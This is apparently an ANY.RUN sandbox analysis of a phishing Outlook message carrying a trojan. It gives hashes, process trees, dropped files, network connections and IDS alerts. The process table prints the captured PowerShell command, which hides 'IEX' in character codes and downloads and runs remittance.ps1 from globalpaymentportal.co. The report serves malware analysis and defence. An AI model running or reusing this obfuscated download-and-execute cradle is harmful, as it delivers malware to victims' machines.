analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Administrator Notification_ Redirecting email with malware.msg

Full analysis: https://app.any.run/tasks/53c8f8ce-1f21-4e12-b69c-ff57bb895b34
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 13:06:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

51BAC05C3916AF1B05DA1427A3FDB31E

SHA1:

FC9887343952243E73AEEBC48EB04B730362BC20

SHA256:

69456DFCB8FFE47D5B85BD55D2B5189697FF7CD2D5DDA2EED88DFD2BEE59D584

SSDEEP:

768:wg4e9zb5+KLhWsK3WsKINIDNh/CRNnS+wEMb/2KZF1/1LDNh42FIe1kWQRX19VYC:HlWfWorwEimhWQRF9+PfWWoWHX8DHUx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 2408)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2408)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2408)
      • powershell.exe (PID: 3036)
    • Executes PowerShell scripts

      • WinRAR.exe (PID: 2812)
  • INFO

    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 2408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe winrar.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2408"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
2812"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IKFS8U22\Payment Details.zip"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3036"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $xu=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $xu;$nfr=((New-Object Net.WebClient)).DownloadString('http://globalpaymentportal.co/eft/remittance.ps1');s $nfrC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 091
Read events
2 073
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
28
Unknown types
3

Dropped files

PID
Process
Filename
Type
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA4F5.tmp.cvr
MD5:
SHA256:
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFB38FA06D499C93E1.TMP
MD5:
SHA256:
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IKFS8U22\Payment Details (2).zip\:Zone.Identifier:$DATA
MD5:
SHA256:
3036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2HAO6EIW28IWFE2ZTK3B.temp
MD5:
SHA256:
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.logtext
MD5:6D12DBFFA6A2440DFA3B04656D2E2106
SHA256:6B6A0B012DBDF1AC563919C13301E50CC9BAD861EEEB05B7E27C162AFBF76DFB
2408OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:36FE3F43CCB8227002ED0CCE7FCF03C2
SHA256:2C95DC8A1EA22ACA3BA7FA3F8D0B67D02C64DB6B482437180F524F144D139658
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inftext
MD5:48DD6CAE43CE26B992C35799FCD76898
SHA256:7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IKFS8U22\Payment Details.zipcompressed
MD5:F48D6A935B04AFC3F822CFC2918019C6
SHA256:A1209DB219D3888560D8787C40C8CB5E4BE74CD15587DAFF5216D0BDD5BF3F01
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IKFS8U22\Payment Details (2).zipcompressed
MD5:F48D6A935B04AFC3F822CFC2918019C6
SHA256:A1209DB219D3888560D8787C40C8CB5E4BE74CD15587DAFF5216D0BDD5BF3F01
2408OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\StructuredQuery.logtext
MD5:B0688698196CD79F6014B39E4A6CE9A9
SHA256:A93F84A8040AB923AF685FA8D569EF70DD5101CAF8D76BBEFAF7A86384CE7792
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2408
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3036
powershell.exe
GET
200
68.65.123.232:80
http://globalpaymentportal.co/eft/remittance.ps1
US
text
1.04 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2408
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3036
powershell.exe
68.65.123.232:80
globalpaymentportal.co
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
globalpaymentportal.co
  • 68.65.123.232
malicious

Threats

PID
Process
Class
Message
3036
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3036
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Script/Oneeva.A!ml
3036
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
2 ETPRO signatures available at the full report
No debug info